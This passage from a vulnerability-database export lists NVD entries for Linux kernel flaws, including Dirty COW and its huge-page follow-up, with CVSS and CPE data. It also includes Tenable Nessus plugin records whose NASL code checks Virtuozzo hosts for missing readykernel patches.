"cpe:/o:linux:linux_kernel:4.15", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:redhat:virtualization_host:4.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-1000407", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000407", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.15:rc1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.15:rc2:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:13:19", "description": "The Linux Kernel versions 2.6.38 through 4.14 have a problematic use of pmd_mkdirty() in the touch_pmd() function inside the THP implementation. touch_pmd() can be reached by get_user_pages(). In such case, the pmd will become dirty. 
This scenario breaks the new can_follow_write_pmd()'s logic - pmd can become dirty without going through a COW cycle. This bug is not as severe as the original \"Dirty cow\" because an ext4 file (or any other regular file) cannot be mapped using THP. Nevertheless, it does allow us to overwrite read-only huge pages. For example, the zero huge page and sealed shmem files can be overwritten (since their mapping can be populated using THP). Note that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) thp.", "edition": 16, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-30T22:29:00", "title": "CVE-2017-1000405", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000405"], "modified": "2018-02-13T02:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.14"], "id": "CVE-2017-1000405", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000405", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.14:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:13:26", "description": "The XFRM 
dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel before 4.13.11 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages.", "edition": 19, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-24T10:29:00", "title": "CVE-2017-16939", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16939"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2017-16939", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16939", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2020-12-09T20:13:38", "description": "The dccp_disconnect function in net/dccp/proto.c in the Linux kernel through 4.14.3 allows local users to gain privileges or cause a denial of service (use-after-free) via an AF_UNSPEC connect system call during the DCCP_LISTEN state.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-05T09:29:00", "title": "CVE-2017-8824", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8824"], "modified": "2018-12-13T11:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.14.3"], "id": "CVE-2017-8824", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8824", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.14.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:39", "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\"", "edition": 17, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": 
"2016-11-10T21:59:00", "title": "CVE-2016-5195", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5195"], "modified": "2020-02-17T16:15:00", "cpe": ["cpe:/o:redhat:enterprise_linux_aus:6.2", "cpe:/o:redhat:enterprise_linux_eus:7.1", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux_long_life:5.6", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_eus:6.6", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:redhat:enterprise_linux_aus:6.5", "cpe:/o:redhat:enterprise_linux_eus:6.7", "cpe:/o:redhat:enterprise_linux_tus:6.5", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_long_life:5.9", "cpe:/o:redhat:enterprise_linux_aus:6.4", "cpe:/o:canonical:ubuntu_core:15.04", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2016-5195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5195", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_long_life:5.6:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_core:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_long_life:5.9:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:7.1:*:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux:5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:6.7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_tus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:6.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.5:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-01-06T09:13:18", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. 
A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 31, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-12T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-110)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "modified": "2017-12-12T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-110.NASL", "href": "https://www.tenable.com/plugins/nessus/105166", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105166);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-1000407\",\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-110)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that 
socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2909950\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-33.22-39.1-2.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6bc504c3\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.26.1.vz7.33.22\",\n \"patch\",\"readykernel-patch-33.22-39.1-2.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:13:17", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). 
An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-12T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-109)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8824", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "modified": "2017-12-12T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-109.NASL", "href": "https://www.tenable.com/plugins/nessus/105165", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105165);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-109)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. 
This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2909949\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.10-39.2-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0bdc5b07\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.15-39.2-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c98f8bd6\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2017/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.10\",\n \"patch\",\"readykernel-patch-30.10-39.2-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.15\",\n \"patch\",\"readykernel-patch-30.15-39.2-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:13:25", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A vulnerability was found in DCCP socket handling code.\n dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - The function get_net_ns_by_id() does not check the\n net.count value when processing a peer network, which\n could lead to double free and memory corruption. 
An\n unprivileged local user could use this vulnerability to\n crash the system.\n\n - If the system uses iptables and there are iptables\n rules with TCPMSS action there, a remote attacker could\n cause a denial of service (use-after-free in\n tcpmss_mangle_packet function leading to memory\n corruption) or possibly have unspecified other impact\n by sending specially crafted network packets.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, could exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 33, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-16T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2018-004)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-15129", "CVE-2017-8824", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-18017", "CVE-2017-1000405"], "modified": "2018-01-16T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2018-004.NASL", "href": "https://www.tenable.com/plugins/nessus/106052", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106052);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-15129\",\n \"CVE-2017-16939\",\n \"CVE-2017-18017\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2018-004)\");\n 
script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A vulnerability was found in DCCP socket handling code.\n dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - The function get_net_ns_by_id() does not check the\n net.count value when processing a peer network, which\n could lead to double free and memory corruption. An\n unprivileged local user could use this vulnerability to\n crash the system.\n\n - If the system uses iptables and there are iptables\n rules with TCPMSS action there, a remote attacker could\n cause a denial of service (use-after-free in\n tcpmss_mangle_packet function leading to memory\n corruption) or possibly have unspecified other impact\n by sending specially crafted network packets.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). 
